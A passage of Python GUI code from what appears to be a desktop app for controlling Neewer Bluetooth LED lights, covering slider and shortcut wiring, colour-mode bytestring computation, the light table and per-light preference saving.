    if platform.system() == "Darwin":  # if we're on MacOS, then change the column text for the 2nd column in the light table
        self.lightTable.horizontalHeaderItem(1).setText("Light UUID")

    # Fix: "self.show" was a bare method reference and was never actually
    # called, so the window was never shown — call it.
    self.show()
def connectMe(self):
    """Wire every widget signal and keyboard shortcut to its handler.

    Called once from __init__.  Covers the scan/connect buttons, the
    CCT/HSI/ANM sliders and scene buttons, the on/off buttons, the
    preferences Save button, and all keyboard shortcuts.
    """
    self.scanCommandButton.clicked.connect(self.startSelfSearch)
    self.tryConnectButton.clicked.connect(self.startConnect)

    self.ColorModeTabWidget.currentChanged.connect(self.tabChanged)
    self.lightTable.itemSelectionChanged.connect(self.selectionChanged)

    # CCT sliders: 1 = brightness, 2 = hue/color temperature
    self.Slider_CCT_Hue.valueChanged.connect(lambda: self.computeValueCCT(2))
    self.Slider_CCT_Bright.valueChanged.connect(lambda: self.computeValueCCT(1))
    self.Slider_HSI_1_H.valueChanged.connect(self.computeValueHSI)
    self.Slider_HSI_2_S.valueChanged.connect(self.computeValueHSI)
    self.Slider_HSI_3_L.valueChanged.connect(self.computeValueHSI)
    # Scene brightness slider (0) and the nine scene/animation buttons (1-9)
    self.Slider_ANM_Brightness.valueChanged.connect(lambda: self.computeValueANM(0))
    self.Button_1_police_A.clicked.connect(lambda: self.computeValueANM(1))
    self.Button_1_police_B.clicked.connect(lambda: self.computeValueANM(2))
    self.Button_1_police_C.clicked.connect(lambda: self.computeValueANM(3))
    self.Button_2_party_A.clicked.connect(lambda: self.computeValueANM(4))
    self.Button_2_party_B.clicked.connect(lambda: self.computeValueANM(5))
    self.Button_2_party_C.clicked.connect(lambda: self.computeValueANM(6))
    self.Button_3_lightning_A.clicked.connect(lambda: self.computeValueANM(7))
    self.Button_3_lightning_B.clicked.connect(lambda: self.computeValueANM(8))
    self.Button_3_lightning_C.clicked.connect(lambda: self.computeValueANM(9))

    self.turnOffButton.clicked.connect(self.turnLightOff)
    self.turnOnButton.clicked.connect(self.turnLightOn)
    self.savePrefsButton.clicked.connect(self.savePrefs)

    # SHORTCUT KEYS
    self.SC_turnOffButton = QShortcut(QKeySequence("Ctrl+PgDown"), self)
    self.SC_turnOffButton.activated.connect(self.turnLightOff)
    self.SC_turnOnButton = QShortcut(QKeySequence("Ctrl+PgUp"), self)
    self.SC_turnOnButton.activated.connect(self.turnLightOn)
    self.SC_scanCommandButton = QShortcut(QKeySequence("Ctrl+Shift+S"), self)
    self.SC_scanCommandButton.activated.connect(self.startSelfSearch)
    self.SC_tryConnectButton = QShortcut(QKeySequence("Ctrl+Shift+C"), self)
    self.SC_tryConnectButton.activated.connect(self.startConnect)
    # Alt+1..Alt+4 switch between the CCT / HSI / SCENE / PREFS tabs
    self.SC_Tab_CCT = QShortcut(QKeySequence("Alt+1"), self)
    self.SC_Tab_CCT.activated.connect(lambda: self.switchToTab(0))
    self.SC_Tab_HSI = QShortcut(QKeySequence("Alt+2"), self)
    self.SC_Tab_HSI.activated.connect(lambda: self.switchToTab(1))
    self.SC_Tab_SCENE = QShortcut(QKeySequence("Alt+3"), self)
    self.SC_Tab_SCENE.activated.connect(lambda: self.switchToTab(2))
    self.SC_Tab_PREFS = QShortcut(QKeySequence("Alt+4"), self)
    self.SC_Tab_PREFS.activated.connect(lambda: self.switchToTab(3))

    # DECREASE/INCREASE BRIGHTNESS REGARDLESS OF WHICH TAB WE'RE ON
    # (slider index 0 means "the current tab's brightness slider")
    self.SC_Dec_Bri_Small = QShortcut(QKeySequence("/"), self)
    self.SC_Dec_Bri_Small.activated.connect(lambda: self.changeSliderValue(0, -1))
    self.SC_Inc_Bri_Small = QShortcut(QKeySequence("*"), self)
    self.SC_Inc_Bri_Small.activated.connect(lambda: self.changeSliderValue(0, 1))
    self.SC_Dec_Bri_Large = QShortcut(QKeySequence("Ctrl+/"), self)
    self.SC_Dec_Bri_Large.activated.connect(lambda: self.changeSliderValue(0, -5))
    self.SC_Inc_Bri_Large = QShortcut(QKeySequence("Ctrl+*"), self)
    self.SC_Inc_Bri_Large.activated.connect(lambda: self.changeSliderValue(0, 5))

    # ADJUST THE SLIDERS ON THE CURRENT TAB (OR IF WE'RE ON SCENE MODE, CHANGE THE SCENE)
    self.SC_Num1 = QShortcut(QKeySequence("1"), self)
    self.SC_Num1.activated.connect(lambda: self.numberShortcuts(1))
    self.SC_Num2 = QShortcut(QKeySequence("2"), self)
    self.SC_Num2.activated.connect(lambda: self.numberShortcuts(2))
    self.SC_Num3 = QShortcut(QKeySequence("3"), self)
    self.SC_Num3.activated.connect(lambda: self.numberShortcuts(3))
    self.SC_Num4 = QShortcut(QKeySequence("4"), self)
    self.SC_Num4.activated.connect(lambda: self.numberShortcuts(4))
    self.SC_Num5 = QShortcut(QKeySequence("5"), self)
    self.SC_Num5.activated.connect(lambda: self.numberShortcuts(5))
    self.SC_Num6 = QShortcut(QKeySequence("6"), self)
    self.SC_Num6.activated.connect(lambda: self.numberShortcuts(6))
    self.SC_Num7 = QShortcut(QKeySequence("7"), self)
    self.SC_Num7.activated.connect(lambda: self.numberShortcuts(7))
    self.SC_Num8 = QShortcut(QKeySequence("8"), self)
    self.SC_Num8.activated.connect(lambda: self.numberShortcuts(8))
    self.SC_Num9 = QShortcut(QKeySequence("9"), self)
    self.SC_Num9.activated.connect(lambda: self.numberShortcuts(9))

    # THE CTRL+NUM SHORTCUTS ARE ONLY FOR SLIDERS, SO WE DON'T NEED A CUSTOM FUNCTION
    self.SC_Dec_1_Large = QShortcut(QKeySequence("Ctrl+7"), self)
    self.SC_Dec_1_Large.activated.connect(lambda: self.changeSliderValue(1, -5))
    self.SC_Inc_1_Large = QShortcut(QKeySequence("Ctrl+9"), self)
    self.SC_Inc_1_Large.activated.connect(lambda: self.changeSliderValue(1, 5))
    self.SC_Dec_2_Large = QShortcut(QKeySequence("Ctrl+4"), self)
    self.SC_Dec_2_Large.activated.connect(lambda: self.changeSliderValue(2, -5))
    self.SC_Inc_2_Large = QShortcut(QKeySequence("Ctrl+6"), self)
    self.SC_Inc_2_Large.activated.connect(lambda: self.changeSliderValue(2, 5))
    self.SC_Dec_3_Large = QShortcut(QKeySequence("Ctrl+1"), self)
    self.SC_Dec_3_Large.activated.connect(lambda: self.changeSliderValue(3, -5))
    self.SC_Inc_3_Large = QShortcut(QKeySequence("Ctrl+3"), self)
    self.SC_Inc_3_Large.activated.connect(lambda: self.changeSliderValue(3, 5))
def switchToTab(self, theTab):
    """Switch the color-mode tab widget to *theTab*, but only if that
    tab is currently enabled (disabled tabs are never switched to)."""
    # isTabEnabled() already returns a bool — no need to compare == True.
    if self.ColorModeTabWidget.isTabEnabled(theTab):
        self.ColorModeTabWidget.setCurrentIndex(theTab)
def numberShortcuts(self, theNumber):
    """Handle the 1-9 number-key shortcuts.

    On the SCENE tab (index 2) the number selects an animation.  On any
    other tab the keys map to sliders: 7/9 decrement/increment slider 1,
    4/6 slider 2, 1/3 slider 3.  Keys 2, 5 and 8 deliberately have no
    slider action — they only select scenes.
    """
    # THE KEYS:
    # 7 AND 9 ADJUST THE FIRST SLIDER ON A TAB
    # 4 AND 6 ADJUST THE SECOND SLIDER ON A TAB
    # 1 AND 3 ADJUST THE THIRD SLIDER ON A TAB
    # UNLESS WE'RE IN SCENE MODE, THEN THEY JUST SWITCH THE SCENE
    if theNumber == 1:
        if self.ColorModeTabWidget.currentIndex() == 2:  # if we're on the SCENE tab, then the number keys correspond to an animation
            self.computeValueANM(1)
        else:  # if we're not, adjust the slider
            self.changeSliderValue(3, -1)  # decrement slider 3
    elif theNumber == 2:
        if self.ColorModeTabWidget.currentIndex() == 2:
            self.computeValueANM(2)
        # no slider action for key 2 outside of SCENE mode
    elif theNumber == 3:
        if self.ColorModeTabWidget.currentIndex() == 2:
            self.computeValueANM(3)
        else:
            self.changeSliderValue(3, 1)  # increment slider 3
    elif theNumber == 4:
        if self.ColorModeTabWidget.currentIndex() == 2:
            self.computeValueANM(4)
        else:
            self.changeSliderValue(2, -1)  # decrement slider 2
    elif theNumber == 5:
        if self.ColorModeTabWidget.currentIndex() == 2:
            self.computeValueANM(5)
        # no slider action for key 5 outside of SCENE mode
    elif theNumber == 6:
        if self.ColorModeTabWidget.currentIndex() == 2:
            self.computeValueANM(6)
        else:
            self.changeSliderValue(2, 1)  # increment slider 2
    elif theNumber == 7:
        if self.ColorModeTabWidget.currentIndex() == 2:
            self.computeValueANM(7)
        else:
            self.changeSliderValue(1, -1)  # decrement slider 1
    elif theNumber == 8:
        if self.ColorModeTabWidget.currentIndex() == 2:
            self.computeValueANM(8)
        # no slider action for key 8 outside of SCENE mode
    elif theNumber == 9:
        if self.ColorModeTabWidget.currentIndex() == 2:
            self.computeValueANM(9)
        else:
            self.changeSliderValue(1, 1)  # increment slider 1
def changeSliderValue(self, sliderToChange, changeAmt):
    """Nudge one slider on the currently visible tab by *changeAmt*.

    sliderToChange 1-3 address the first/second/third slider of the tab;
    0 always means "the brightness slider of the current tab".  Requests
    that don't map to a slider on the current tab are ignored (e.g. CCT
    mode only has 2 sliders, so a request for the "3rd" does nothing).
    """
    tab = self.ColorModeTabWidget.currentIndex()
    target = None

    if tab == 0:  # CCT: hue/temperature is slider 1, brightness is 2 (and 0)
        if sliderToChange == 1:
            target = self.Slider_CCT_Hue
        elif sliderToChange in (0, 2):
            target = self.Slider_CCT_Bright
    elif tab == 1:  # HSI: H is 1, S is 2, intensity is 3 (and 0)
        if sliderToChange == 1:
            target = self.Slider_HSI_1_H
        elif sliderToChange == 2:
            target = self.Slider_HSI_2_S
        elif sliderToChange in (0, 3):
            target = self.Slider_HSI_3_L
    elif tab == 2:  # SCENE: only the brightness slider exists
        if sliderToChange == 0:
            target = self.Slider_ANM_Brightness

    if target is not None:
        target.setValue(target.value() + changeAmt)
def checkLightTab(self, selectedLight = -1):
    """Keep the current tab consistent with the selected light.

    On the CCT tab, widen/narrow the color-temperature slider depending
    on whether the selected light allows the extended (85(00)K) range;
    on the Preferences tab, refresh the prefs widgets for the selected
    light.  selectedLight of -1 means "no light selected".
    """
    if self.ColorModeTabWidget.currentIndex() == 0:  # if we're on the CCT tab, do the check
        if selectedLight == -1:  # if we don't have a light selected
            self.setupCCTBounds(56)  # restore the bounds to their default of 56(00)K
        else:
            if availableLights[selectedLight][4] == True:  # if we're supposed to be extending the range
                if self.Slider_CCT_Hue.maximum() == 56:  # if we're set to extend the range, but we're still set to 56(00)K, then change the range
                    self.setupCCTBounds(85)
            else:
                if self.Slider_CCT_Hue.maximum() == 85:  # if we're set to NOT extend the range, but we're still set to 85(00)K, then reduce the range
                    self.setupCCTBounds(56)
    elif self.ColorModeTabWidget.currentIndex() == 3:  # if we're on the Preferences tab instead
        if selectedLight != -1:  # if there is a specific selected light
            self.setupPrefsTab(selectedLight)  # update the Prefs tab with the information for that selected light
def setupCCTBounds(self, gradientBounds):
    """Set the CCT slider's maximum and repaint its gradient background.

    gradientBounds is the new slider maximum in hundreds of Kelvin:
    56 for the standard 5600K limit, anything else is treated as the
    extended 8500K limit.
    """
    self.Slider_CCT_Hue.setMaximum(gradientBounds)  # set the max value of the color temperature slider to the new max bounds
    gradient = QLinearGradient(0, 0, 532, 31)

    # SET GRADIENT OF CCT SLIDER IN CHUNKS OF 5 VALUES BASED ON BOUNDARY
    if gradientBounds == 56:  # the color temperature boundary is 5600K
        gradient.setColorAt(0.0, QColor(255, 187, 120, 255))  # 3200K
        gradient.setColorAt(0.25, QColor(255, 204, 153, 255))  # 3800K
        gradient.setColorAt(0.50, QColor(255, 217, 182, 255))  # 4400K
        gradient.setColorAt(0.75, QColor(255, 228, 206, 255))  # 5000K
        gradient.setColorAt(1.0, QColor(255, 238, 227, 255))  # 5600K
    else:  # the color temperature boundary is 8500K
        gradient.setColorAt(0.0, QColor(255, 187, 120, 255))  # 3200K
        gradient.setColorAt(0.25, QColor(255, 219, 186, 255))  # 4500K
        gradient.setColorAt(0.50, QColor(255, 240, 233, 255))  # 5800K
        gradient.setColorAt(0.75, QColor(243, 242, 255, 255))  # 7100K
        gradient.setColorAt(1.0, QColor(220, 229, 255, 255))  # 8500K

    self.CCT_Temp_Gradient_BG.scene().setBackgroundBrush(gradient)  # change the gradient to fit the new boundary
def setupPrefsTab(self, selectedLight):
    """Fill the Preferences tab widgets from availableLights[selectedLight].

    Loads the custom name (index 2), the "extended CCT range" flag
    (index 4) and the "CCT-only / send BRI+HUE independently" flag
    (index 5) into their widgets.
    """
    self.customNameTF.setText(availableLights[selectedLight][2])  # set the "custom name" field to the custom name of this light

    # setChecked() accepts the flag directly; the original
    # "if x == True: setChecked(True) else: setChecked(False)" branches
    # were redundant.  "== True" is kept so non-bool truthy values keep
    # the exact same semantics as before.
    self.widerRangeCheck.setChecked(availableLights[selectedLight][4] == True)
    self.onlyCCTModeCheck.setChecked(availableLights[selectedLight][5] == True)
# CHECK TO SEE WHETHER OR NOT TO ENABLE/DISABLE THE "Connect" BUTTON OR CHANGE THE PREFS TAB
def selectionChanged(self):
    """React to a change in the light-table selection.

    Enables/disables the Connect button, the on/off buttons and the mode
    tabs depending on how many lights are selected (none / one / many),
    and — for a single selection — restores that light's last-sent mode
    parameters into the GUI.
    """
    selectedRows = self.selectedLights()  # get the list of currently selected lights

    if len(selectedRows) > 0:  # if we have a selection
        self.tryConnectButton.setEnabled(True)  # if we have light(s) selected in the table, then enable the "Connect" button

        if len(selectedRows) == 1:  # we have exactly one light selected
            self.ColorModeTabWidget.setTabEnabled(3, True)  # enable the "Preferences" tab for this light

            # SWITCH THE TURN ON/OFF BUTTONS ON, AND CHANGE TEXT TO SINGLE BUTTON TEXT
            self.turnOffButton.setText("Turn Light Off")
            self.turnOffButton.setEnabled(True)
            self.turnOnButton.setText("Turn Light On")
            self.turnOnButton.setEnabled(True)

            self.ColorModeTabWidget.setTabEnabled(0, True)

            if availableLights[selectedRows[0]][5] == True:  # if this light is CCT only, then disable the HSI and ANM tabs
                self.ColorModeTabWidget.setTabEnabled(1, False)  # disable the HSI mode tab
                self.ColorModeTabWidget.setTabEnabled(2, False)  # disable the ANM/SCENE tab
            else:  # we can use HSI and ANM/SCENE modes, so enable those tabs
                self.ColorModeTabWidget.setTabEnabled(1, True)  # enable the HSI mode tab
                self.ColorModeTabWidget.setTabEnabled(2, True)  # enable the ANM/SCENE tab

            currentlySelectedRow = selectedRows[0]  # get the row index of the 1 selected item
            self.checkLightTab(currentlySelectedRow)  # if we're on CCT, check to see if this light can use extended values + on Prefs, update Prefs

            # RECALL LAST SENT SETTING FOR THIS PARTICULAR LIGHT, IF A SETTING EXISTS
            # (index 3 = last params, index 6 = light on/off; sendValue[1]
            # is the mode byte: 135=CCT, 134=HSI, 136=ANM/SCENE)
            if availableLights[currentlySelectedRow][3] != []:  # if the last set parameters aren't empty
                if availableLights[currentlySelectedRow][6] != False:  # if the light is listed as being turned ON
                    sendValue = availableLights[currentlySelectedRow][3]  # make the current "sendValue" the last set parameter so it doesn't re-send it on re-load

                    if sendValue[1] == 135:  # the last parameter was a CCT mode change
                        self.setUpGUI(colorMode="CCT",
                                      brightness=sendValue[3],
                                      temp=sendValue[4])
                    elif sendValue[1] == 134:  # the last parameter was a HSI mode change
                        # hue is sent as a 16-bit little-endian pair (bytes 3 and 4)
                        self.setUpGUI(colorMode="HSI",
                                      hue=sendValue[3] + (256 * sendValue[4]),
                                      sat=sendValue[5],
                                      brightness=sendValue[6])
                    elif sendValue[1] == 136:  # the last parameter was a ANM/SCENE mode change
                        self.setUpGUI(colorMode="ANM",
                                      brightness=sendValue[3],
                                      scene=sendValue[4])
                else:
                    self.ColorModeTabWidget.setCurrentIndex(0)  # switch to the CCT tab if the light is off and there ARE prior parameters
            else:
                self.ColorModeTabWidget.setCurrentIndex(0)  # switch to the CCT tab if there are no prior parameters
        else:  # we have multiple lights selected
            # SWITCH THE TURN ON/OFF BUTTONS ON, AND CHANGE TEXT TO MULTIPLE LIGHTS TEXT
            self.turnOffButton.setText("Turn Light(s) Off")
            self.turnOffButton.setEnabled(True)
            self.turnOnButton.setText("Turn Light(s) On")
            self.turnOnButton.setEnabled(True)

            self.ColorModeTabWidget.setTabEnabled(0, True)
            self.ColorModeTabWidget.setTabEnabled(1, True)  # enable the "HSI" mode tab
            self.ColorModeTabWidget.setTabEnabled(2, True)  # enable the "ANM/SCENE" mode tab
            self.ColorModeTabWidget.setTabEnabled(3, False)  # disable the "Preferences" tab, as we have multiple lights selected
    else:  # the selection has been cleared or there are no lights to select
        currentTab = self.ColorModeTabWidget.currentIndex()  # get the currently selected tab (so when we disable the tabs, we stick on the current one)

        self.tryConnectButton.setEnabled(False)  # if we have no lights selected, disable the Connect button

        # SWITCH THE TURN ON/OFF BUTTONS OFF, AND CHANGE TEXT TO GENERIC TEXT
        self.turnOffButton.setText("Turn Light(s) Off")
        self.turnOffButton.setEnabled(False)
        self.turnOnButton.setText("Turn Light(s) On")
        self.turnOnButton.setEnabled(False)

        self.ColorModeTabWidget.setTabEnabled(0, False)
        self.ColorModeTabWidget.setTabEnabled(1, False)  # disable the "HSI" mode tab
        self.ColorModeTabWidget.setTabEnabled(2, False)  # disable the "ANM/SCENE" mode tab
        self.ColorModeTabWidget.setTabEnabled(3, False)  # disable the "Preferences" tab, as we have no lights selected

        if currentTab != 3:
            self.ColorModeTabWidget.setCurrentIndex(currentTab)  # disable the tabs, but don't switch the current one shown
        else:
            self.ColorModeTabWidget.setCurrentIndex(0)  # if we're on Prefs, then switch to the CCT tab

        self.checkLightTab()  # check to see if we're on the CCT tab - if we are, then restore order
def savePrefs(self):
    """Persist the Preferences tab settings for the single selected light.

    Stores the custom name / extended-range / CCT-only flags back into
    availableLights, refreshes that light's table row, and writes a
    "name|widerRange|cctOnly" string to a per-light file (named after
    the light's MAC address, colons removed) in the light_prefs folder.
    """
    selectedRows = self.selectedLights()  # get the list of currently selected lights

    if len(selectedRows) == 1:  # if we have 1 selected light - which should never be false, as we can't use Prefs with more than 1
        availableLights[selectedRows[0]][2] = self.customNameTF.text()  # set this light's custom name to the text box
        availableLights[selectedRows[0]][4] = self.widerRangeCheck.isChecked()  # if the "wider range" box is checked, then allow wider ranges
        availableLights[selectedRows[0]][5] = self.onlyCCTModeCheck.isChecked()  # if the option to send BRI and HUE separately is checked, then turn that on

        # IF A CUSTOM NAME IS SET UP FOR THIS LIGHT, THEN CHANGE THE TABLE TO REFLECT THAT
        # (the ")" "\n..." below is deliberate implicit string concatenation)
        if availableLights[selectedRows[0]][2] != "":
            self.setTheTable([availableLights[selectedRows[0]][2] + " (" + availableLights[selectedRows[0]][0].name + ")" "\n  [ʀssɪ: " + str(availableLights[selectedRows[0]][0].rssi) + " dBm]",
                              "", "", ""], selectedRows[0])

        # CREATE THE light_prefs FOLDER IF IT DOESN'T EXIST
        try:
            os.mkdir(os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs")
        except FileExistsError:
            pass  # the folder already exists, so we don't need to create it

        # GET THE CUSTOM FILENAME FOR THIS FILE, NOTED FROM THE MAC ADDRESS OF THE CURRENT LIGHT
        exportFileName = availableLights[selectedRows[0]][0].address.split(":")  # take the colons out of the MAC address
        exportFileName = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "".join(exportFileName)

        # BUILD THE PREFERENCES STRING ("|"-separated: name, wider range, CCT only)
        exportString = availableLights[selectedRows[0]][2] + "|"  # the custom name
        exportString = exportString + str(availableLights[selectedRows[0]][4]) + "|"  # whether or not to allow this light to have wider range
        exportString = exportString + str(availableLights[selectedRows[0]][5])  # whether or not to allow only CCT mode for this light

        # WRITE THE PREFERENCES FILE
        with open(exportFileName, "w") as prefsFileToWrite:
            prefsFileToWrite.write(exportString)

        printDebugString("Exported preferences for this light to " + exportFileName)
# ADD A LIGHT TO THE TABLE VIEW
def setTheTable(self, infoArray, rowToChange = -1):
    """Add or update one row of the light table.

    infoArray holds 4 strings — [name, MAC address, linked status,
    status message]; an empty string leaves that column untouched.
    With the default rowToChange of -1 a new row is appended, otherwise
    the given row is updated in place.
    """
    if rowToChange == -1:
        currentRow = self.lightTable.rowCount()
        self.lightTable.insertRow(currentRow)  # if rowToChange is not specified, then we'll make a new row at the end
    else:
        currentRow = rowToChange  # change data for the specified row

    if infoArray[0] != "":  # the name of the light
        self.lightTable.setItem(currentRow, 0, QTableWidgetItem(infoArray[0]))
    if infoArray[1] != "":  # the MAC address of the light
        self.lightTable.setItem(currentRow, 1, QTableWidgetItem(infoArray[1]))
    if infoArray[2] != "":  # the Linked status of the light
        self.lightTable.setItem(currentRow, 2, QTableWidgetItem(infoArray[2]))
        self.lightTable.item(currentRow, 2).setTextAlignment(Qt.AlignCenter)  # align the light status info to be center-justified
    if infoArray[3] != "":  # the current status message of the light
        self.lightTable.setItem(currentRow, 3, QTableWidgetItem(infoArray[3]))

    self.lightTable.resizeRowsToContents()
def returnTableInfo(self, row, column):
    """Return the text currently shown in the given cell of the light table."""
    tableCell = self.lightTable.item(row, column)
    return tableCell.text()
# CLEAR ALL LIGHTS FROM THE TABLE VIEW
def clearTheTable(self):
    """Empty the light table entirely; does nothing if it is already empty."""
    if self.lightTable.rowCount() > 0:
        self.lightTable.clearContents() # wipe the cell contents...
        self.lightTable.setRowCount(0) # ...and remove the now-empty rows themselves
# TELL THE BACKGROUND THREAD TO START LOOKING FOR LIGHTS
def startSelfSearch(self):
    """Ask the background worker thread to begin a Bluetooth scan for lights."""
    global threadAction
    self.statusBar.showMessage("Please wait - searching for Neewer lights...")
    threadAction = "discover" # the worker thread picks this flag up on its next tick
# TELL THE BACKGROUND THREAD TO START CONNECTING TO LIGHTS
def startConnect(self):
    """Ask the background worker thread to link to the discovered lights."""
    global threadAction
    threadAction = "connect" # the worker thread picks this flag up on its next tick
# TELL THE BACKGROUND THREAD TO START SENDING TO THE LIGHTS
def startSend(self):
    """Queue a "send" request for the background thread.

    The request is only queued when the thread is idle (flag is ""), so an
    action already in flight is never clobbered.
    """
    global threadAction
    if threadAction == "":
        threadAction = "send"
# IF YOU CLICK ON ONE OF THE TABS, THIS WILL SWITCH THE VIEW/SEND A NEW SIGNAL FROM THAT SPECIFIC TAB
def tabChanged(self, i):
    """React to the mode tab bar switching to tab index i.

    Tab indexes: 0 = CCT, 1 = HSI, 2 = ANM/scene, 3 = light preferences.
    For CCT/HSI, the current value is recomputed (and queued for sending)
    only when exactly one light is selected and that light is powered on
    (availableLights[n][6] is its "light on" flag).
    """
    currentSelection = self.selectedLights() # get the list of currently selected lights
    if i == 0: # we clicked on the CCT tab
        if len(currentSelection) > 0: # if we have something selected
            if len(currentSelection) == 1: # if we have just one light selected
                # CHECK THE CURRENT SELECTED LIGHT TO SEE IF IT CAN USE EXTENDED COLOR TEMPERATURES
                self.checkLightTab(currentSelection[0]) # set up the current light's CCT bounds
                if availableLights[currentSelection[0]][6] != False: # if the light that's selected is off, then don't update CCT value
                    self.computeValueCCT() # calculate the current CCT value
            else: # if we have more than one light selected
                self.checkLightTab() # reset the bounds to the normal values (5600K)
    elif i == 1: # we clicked on the HSI tab
        if len(currentSelection) == 1: # if we have only one thing selected
            if availableLights[currentSelection[0]][6] != False: # if the light that's selected is off, then don't update HSI value
                self.computeValueHSI() # calculate the current HSI value
    elif i == 2: # we clicked on the ANM tab
        pass # skip this, we don't want the animation automatically triggering when we go to this page - but keep it for readability
    elif i == 3: # we clicked on the PREFS tab
        if len(currentSelection) == 1: # this tab function ^^ should *ONLY* call if we have just one light selected, but just in *case*
            self.setupPrefsTab(currentSelection[0])
# COMPUTE A BYTESTRING FOR THE CCT SECTION
def computeValueCCT(self, hueOrBrightness = -1):
    """Build and queue a CCT-mode bytestring from the CCT sliders.

    hueOrBrightness records which slider triggered the update (-1 means
    "send both hue and brightness"); it is stored in the global CCTSlider,
    which calculateSeparateBytestrings() later consults for lights that
    need hue and brightness sent as separate commands.
    """
    global CCTSlider
    # CCTSlider = -1 # force this value to -1 to send both hue and brightness at the same time on SNL-660
    CCTSlider = hueOrBrightness # set the global CCT "current slider" to the slider you just... slid
    self.TFV_CCT_Hue.setText(str(self.Slider_CCT_Hue.value()) + "00K") # slider value is in hundreds of Kelvin (e.g. 56 -> 5600K)
    calculateByteString(colorMode="CCT",\
                        temp=str(int(self.Slider_CCT_Hue.value())),\
                        brightness=str(int(self.Slider_CCT_Bright.value())))
    self.statusBar.showMessage("Current value (CCT Mode): " + updateStatus())
    self.startSend() # hand the new bytestring off to the background thread
# COMPUTE A BYTESTRING FOR THE HSI SECTION
def computeValueHSI(self):
    """Build and queue an HSI-mode bytestring from the three HSI sliders,
    then show the computed value in the status bar."""
    calculateByteString(colorMode="HSI",\
                        HSI_H=str(int(self.Slider_HSI_1_H.value())),\
                        HSI_S=str(int(self.Slider_HSI_2_S.value())),\
                        HSI_I=str(int(self.Slider_HSI_3_L.value())))
    self.statusBar.showMessage("Current value (HSI Mode): " + updateStatus())
    self.startSend() # hand the new bytestring off to the background thread
# COMPUTE A BYTESTRING FOR THE ANIM SECTION
def computeValueANM(self, buttonPressed):
    """Build and queue an animation (scene) bytestring.

    buttonPressed is the 1-9 scene number of the button that was clicked,
    or 0 to re-send the most recently chosen scene (e.g. after a brightness
    slider change).  The previously highlighted scene button is reset and
    the newly chosen one is highlighted before the command is queued.
    """
    global lastAnimButtonPressed
    # scene number -> button widget lookup; replaces the two 9-branch
    # if/elif ladders that previously selected the widget by hand
    sceneButtons = {
        1: self.Button_1_police_A,
        2: self.Button_1_police_B,
        3: self.Button_1_police_C,
        4: self.Button_2_party_A,
        5: self.Button_2_party_B,
        6: self.Button_2_party_C,
        7: self.Button_3_lightning_A,
        8: self.Button_3_lightning_B,
        9: self.Button_3_lightning_C,
    }
    if buttonPressed == 0: # 0 means "re-use the last scene that was chosen"
        buttonPressed = lastAnimButtonPressed
    else:
        # CHANGE THE OLD BUTTON COLOR BACK TO THE DEFAULT COLOR
        if lastAnimButtonPressed in sceneButtons:
            sceneButtons[lastAnimButtonPressed].setStyleSheet("background-color : None")
        # CHANGE THE NEW BUTTON COLOR TO SHOW WHICH ANIMATION WE'RE CURRENTLY ON
        if buttonPressed in sceneButtons:
            sceneButtons[buttonPressed].setStyleSheet("background-color : aquamarine")
        lastAnimButtonPressed = buttonPressed # remember the scene for later 0-argument calls
    calculateByteString(colorMode="ANM",\
                        brightness=str(int(self.Slider_ANM_Brightness.value())),\
                        animation=str(buttonPressed))
    self.statusBar.showMessage("Current value (ANM Mode): " + updateStatus())
    self.startSend() # hand the new bytestring off to the background thread
def turnLightOn(self):
    """Queue the fixed power-on command for the selected light(s)."""
    self.statusBar.showMessage("Turning light on")
    setPowerBytestring("ON") # build the fixed "power on" bytestring
    self.startSend() # hand it off to the background thread
def turnLightOff(self):
    """Queue the fixed power-off command for the selected light(s)."""
    self.statusBar.showMessage("Turning light off")
    setPowerBytestring("OFF") # build the fixed "power off" bytestring
    self.startSend() # hand it off to the background thread
# ==============================================================
# FUNCTIONS TO RETURN / MODIFY VALUES RUNNING IN THE GUI
# ==============================================================
# RETURN THE ROW INDEXES THAT ARE CURRENTLY HIGHLIGHTED IN THE TABLE VIEW
def selectedLights(self):
    """Return the row indexes currently highlighted in the table view.

    Returns an empty list once the program has been told to quit, so
    callers stop touching the table during shutdown.
    """
    if threadAction == "quit":
        return []
    return [index.row() for index in self.lightTable.selectionModel().selectedRows()]
# UPDATE THE TABLE WITH THE CURRENT INFORMATION FROM availableLights
def updateLights(self):
    """Rebuild the light table from the global availableLights list.

    Also relabels the scan button ("Scan" -> "Re-scan" after a first find)
    and reports in the status bar how many lights the last scan located.
    """
    self.clearTheTable()
    if len(availableLights) != 0: # if we found lights on the last scan
        if self.scanCommandButton.text() == "Scan":
            self.scanCommandButton.setText("Re-scan") # change the "Scan" button to "Re-scan"
        if len(availableLights) == 1: # we found 1 light
            self.statusBar.showMessage("We located 1 Neewer light on the last search")
        elif len(availableLights) > 1: # we found more than 1 light
            self.statusBar.showMessage("We located " + str(len(availableLights)) + " Neewer lights on the last search")
    else: # if we didn't find any (additional) lights on the last scan
        self.statusBar.showMessage("We didn't locate any Neewer lights on the last search")
    for a in range(len(availableLights)):
        light = availableLights[a]
        # build the display name once instead of in four duplicated branches:
        # custom name (if one is set) + model name + RSSI readout
        if light[2] != "": # the light has a custom name
            displayName = light[2] + " (" + light[0].name + ")"
        else: # no custom name, so just use the model # of the light
            displayName = light[0].name
        displayName = displayName + "\n [ʀssɪ: " + str(light[0].rssi) + " dBm]"
        if light[1] == "": # not linked yet (no Bleak object), so put "waiting to connect" as status
            self.setTheTable([displayName, light[0].address, "Waiting", "Waiting to connect..."])
        else: # we have previously tried to connect, so we have a Bleak object - put "waiting to send" as status
            self.setTheTable([displayName, light[0].address, "LINKED", "Waiting to send..."])
# THE FINAL FUNCTION TO UNLINK ALL LIGHTS WHEN QUITTING THE PROGRAM
def closeEvent(self, event):
    """Qt close handler: stop the background thread, then unlink every light.

    Blocks (re-flagging "quit" and sleeping 2s per attempt) until the worker
    thread reports "finished", then disconnects each light in turn on the
    asyncio event loop before the window closes.
    """
    global threadAction
    # WAIT UNTIL THE BACKGROUND THREAD SETS THE threadAction FLAG TO finished SO WE CAN UNLINK THE LIGHTS
    while threadAction != "finished": # wait until the background thread has a chance to terminate
        printDebugString("Waiting for the background thread to terminate...")
        threadAction = "quit" # make sure to tell the thread to quit again (if it missed it the first time)
        time.sleep(2)
    loop = asyncio.get_event_loop()
    # THE THREAD HAS TERMINATED, NOW CONTINUE...
    self.statusBar.showMessage("Quitting program - unlinking from lights...")
    QApplication.processEvents() # force the status bar to update
    # TRY TO DISCONNECT EACH LIGHT FROM BLUETOOTH BEFORE QUITTING THE PROGRAM COMPLETELY
